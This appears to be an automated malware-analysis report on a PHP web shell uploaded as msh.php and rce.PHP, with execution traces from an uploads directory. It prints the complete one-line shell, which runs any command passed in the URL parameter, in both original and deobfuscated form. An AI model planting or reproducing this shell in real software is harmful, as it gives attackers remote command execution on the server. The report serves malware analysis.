msh.php, rce.PHP

md5: bdd25b47a864fe8dcc262c4204a25d7d

Jump to:

Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)

Screenshot
Attributes
Input
_GET (Deobfuscated, Original)

Deobfuscated PHP code
<?php

echo `{$_GET[0]}`;
Execution traces
data/traces/bdd25b47a864fe8dcc262c4204a25d7d_trace-1676254186.0608.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:10:11.958639]
1	0	1	0.000193	393512
1	3	0	0.000256	393936	{main}	1		/var/www/html/uploads/rce.PHP	0	0
2	4	0	0.000301	393936	shell_exec	0		/var/www/html/uploads/rce.PHP	1	1	''
2	4	1	0.000326	393968
2	4	R			FALSE
1	3	1	0.000341	393936
			0.000367	314224
TRACE END   [2023-02-13 00:10:11.958854]

data/traces/bdd25b47a864fe8dcc262c4204a25d7d_trace-1676261441.94.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:11:07.837822]
1	0	1	0.000213	393512
1	3	0	0.000266	393936	{main}	1		/var/www/html/uploads/rce.PHp	0	0
2	4	0	0.000306	393936	shell_exec	0		/var/www/html/uploads/rce.PHp	1	1	''
2	4	1	0.000333	393968
2	4	R			FALSE
1	3	1	0.000348	393936
			0.000377	314224
TRACE END   [2023-02-13 02:11:07.838023]

data/traces/bdd25b47a864fe8dcc262c4204a25d7d_trace-1676261473.8734.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:11:39.771216]
1	0	1	0.000143	393512
1	3	0	0.000188	393936	{main}	1		/var/www/html/uploads/msh.php	0	0
2	4	0	0.000221	393936	shell_exec	0		/var/www/html/uploads/msh.php	1	1	''
2	4	1	0.000244	393968
2	4	R			FALSE
1	3	1	0.000258	393936
			0.000281	314224
TRACE END   [2023-02-13 02:11:39.771382]

Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?=`$_GET[0]`?>

PHP Malware Analysis

msh.php, rce.PHP

md5: bdd25b47a864fe8dcc262c4204a25d7d

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code